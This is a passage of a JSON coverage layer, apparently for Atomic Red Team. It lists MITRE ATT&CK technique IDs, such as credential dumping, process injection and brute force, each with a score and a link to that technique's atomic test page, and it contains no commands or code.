one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View 
